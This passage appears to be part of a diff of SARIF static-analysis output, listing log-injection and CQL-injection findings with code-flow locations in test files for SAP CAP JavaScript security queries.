- "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 56, - "endColumn" : 60 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 32, - "endColumn" : 60 - } - }, - "message" : { - "text" : "`SELECT ... + book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 18, - "endColumn" : 61 - } - }, - "message" : { - "text" : "cds.par ... 
+ book)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 11, - "endColumn" : 61 - } - }, - "message" : { - "text" : "cqn1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 31, - "startColumn" : 39, - "endColumn" : 43 - } - }, - "message" : { - "text" : "cqn1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 11, - "startColumn" : 16, - "endColumn" : 29 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "eae426bf8fad0192:1", - "primaryLocationStartColumnFingerprint" : "9" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - 
"artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 11, - "startColumn" : 25, - "endColumn" : 29 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 11, - "startColumn" : 16, - "endColumn" : 29 - } - }, - "message" : { - "text" : "\"CAP:\" + book" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a 
[user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 47, - "endColumn" : 48 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e05b39891dddd161:1", - "primaryLocationStartColumnFingerprint" : "40" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 15, - "startColumn" : 24, - "endColumn" : 27 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 17, - "endColumn" : 20 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 17, - "endColumn" : 25 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 13, - "endColumn" : 25 - } - }, - "message" : { - "text" : "$" - } - } - }, { - "location" : { - 
"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 47, - "endColumn" : 48 - } - }, - "message" : { - "text" : "$" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 15, - "startColumn" : 24, - "endColumn" : 27 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 25, - "startColumn" : 16, - "endColumn" : 29 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "4dc77ce4a9b7031e:1", - "primaryLocationStartColumnFingerprint" : "9" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 54 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 25, - "startColumn" : 25, - "endColumn" : 29 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 25, - "startColumn" : 16, - "endColumn" : 29 - } - }, - "message" : { - "text" : "\"CAP:\" + book" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { 
- "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7c291d40b7c61d4f:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - 
} - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 7, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : 
"js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7c291d40b7c61d4f:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 47 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 36 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 7, - "startColumn" : 21, - "endColumn" : 34 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 47 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 9, - "startColumn" : 38, - "endColumn" : 51 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 9, - "startColumn" : 36, - "endColumn" : 53 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 7, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1).\nLog entry depends on a [user-provided value](2)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7c291d40b7c61d4f:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 47 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 36 - } - }, - "message" : { - "text" : "{ messageToPass }" - } 
- } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 7, - "startColumn" : 21, - "endColumn" : 34 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 47 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 9, - "startColumn" : 38, - "endColumn" : 51 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 9, - "startColumn" : 36, - "endColumn" : 53 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : 
"%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 